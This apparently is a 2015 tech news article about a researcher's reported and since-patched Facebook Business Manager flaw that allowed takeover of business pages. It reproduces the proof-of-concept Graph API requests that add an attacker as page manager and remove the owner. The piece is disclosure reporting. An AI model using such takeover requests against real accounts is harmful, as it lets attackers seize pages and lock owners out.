Facebook Fan pages can be Hijacked by Hackers to take Admin Control

Facebook vulnerability allows hackers to take admin control of the business pages on Facebook

Security researcher Laxman Muthiya has found a serious vulnerability in the way Facebook business manager allows third party access. This vulnerability can be exploited by hackers to gain limited permissions and the victim will permanently lose admin access to the page.

Detailing his findings on his blog, Laxman has stated that if the vulnerability is exploited, the hacker can take over admin privileges of a Facebook page and remove the victim.

 

By default Facebook application interface do not allow third party applications to add or modify page admin roles (page roles like manager, editor, analyst etc..). Third party applications are allowed to perform all the operations like post statuses on your behalf, publish photos, etc.. except adding admin roles because if an application is allowed to add or remove admins then it could add some user as admin to the page and remove the actual owner permanently.

However business pages on Facebook operate on different theory. There is an endpoint for business pages called userpermissions which allows to add or remove page admin roles who are already handling the Facebook business. Muthiya found out that there is a vulnerability in this endpoint which can be exploited to take over the business page of the victim and remove him/her from admin control.

Laxman found that he could make a manage_pages request to to this endpoint tool using following request

 POST /PGID/userpermissions HTTP/1.1
 Host: graph.facebook.com 
 Content-Length: 245
 role=MANAGER&user=X&business=B&access_token=AAAA...

Page Takeover :

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true

Removing Victim

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true
Thats all! Target page is hacked!

Muthiya contacted the Facebook security team about the vulnerability. Facebook confirmed the vulnerability and awarded him a bug bounty of $2500.00. The vulnerability has been patched by Facebook.

Proof of concept video :

Hacking Facebook PagesAnother Serious Vulnerability in FacebookVulnerability : Hacking Facebook PagesStatus : FixedReward $2500 USDProof Of Concept : https://www.7xter.com/2015/08/hacking-facebook-pages.html

Posted by 7xter on Wednesday, August 26, 2015

vijay

Recent Posts

3 New Ways To Take A ScreenShot On Android Smartphones

Android is possibly the most popular Smartphone OS with more than 2 billion monthly active devices. There might be times…

11 hours ago

What is Mac OS? Pros and Cons | Explanation

"Apple" the most valuable brand in the world produces some of the best Hardware & Software products and Mac OS…

12 hours ago

Google Search is testing ‘Learn To Pronounce’ feature in different speeds and accents

Google Search’s new feature will teach you how to pronounce words in different accents Over a period of time, Google…

14 hours ago

10 Best Free Skype Alternatives For Windows/Android/iOS

Since its advent in 2003, Skype has become an industry standard when it comes to video calling on Windows PC. In…

2 days ago

Sony PlayStation Classic hacked to run games off a USB drive

Hackers crack Sony’s PlayStation Classic shortly after the release Last week, Sony released PlayStation Classic with 20 officially preinstalled games,…

2 days ago

What to Do If Your iPhone or iPad got stuck on Apple logo?

There are situations when people have frozen iPhone and iPad on Apple logo during startup. And, if you are also…

4 days ago